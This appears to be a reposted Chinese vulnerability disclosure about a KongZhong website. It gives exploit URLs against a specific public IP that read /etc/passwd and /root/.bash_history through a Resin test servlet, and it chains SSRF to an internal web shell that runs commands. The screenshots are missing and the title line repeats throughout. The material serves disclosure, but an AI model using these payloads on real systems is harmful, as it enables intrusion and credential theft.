空中网某站点任意文件读取/SSRF导致Getshell企业安全分享!

空中网某站点任意文件读取/SSRF导致Getshell
http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
 

空中网某站点任意文件读取/SSRF导致Getshell


https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
 

空中网某站点任意文件读取/SSRF导致Getshell

https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history
 

空中网某站点任意文件读取/SSRF导致Getshell

内部服务器用户名密码泄露
 

空中网某站点任意文件读取/SSRF导致Getshell
ssrf

空中网某站点任意文件读取/SSRF导致Getshell
可探测内网

空中网某站点任意文件读取/SSRF导致Getshell

探测到内网shell内删除

https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=https://192.168.11.33:8080/shell/shell.jsp?cmd=ifconfig

空中网某站点任意文件读取/SSRF导致Getshell

空中网某站点任意文件读取/SSRF导致Getshell

 

漏洞证明:

https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
 

空中网某站点任意文件读取/SSRF导致Getshell
https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history
 

空中网某站点任意文件读取/SSRF导致Getshell

内部服务器用户名密码泄露
 

空中网某站点任意文件读取/SSRF导致Getshell
ssrf

空中网某站点任意文件读取/SSRF导致Getshell

可探测内网
 

空中网某站点任意文件读取/SSRF导致Getshell

探测到内网shell内删除

https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=https://192.168.11.33:8080/shell/shell.jsp?cmd=ifconfig

 

空中网某站点任意文件读取/SSRF导致Getshell

空中网某站点任意文件读取/SSRF导致Getshell

 

解决方案:

升级版本

www.dengb.comtruehttps://www.dengb.com/qyaq/1085256.htmlTechArticle空中网某站点任意文件读取/SSRF导致Getshell https://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd https://202.108.24.133/resin-doc/…

—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址:https://www.ctvol.com/webstt/esecurity/100420.html

(0)
上一篇 2020年4月26日
下一篇 2020年4月26日

精彩推荐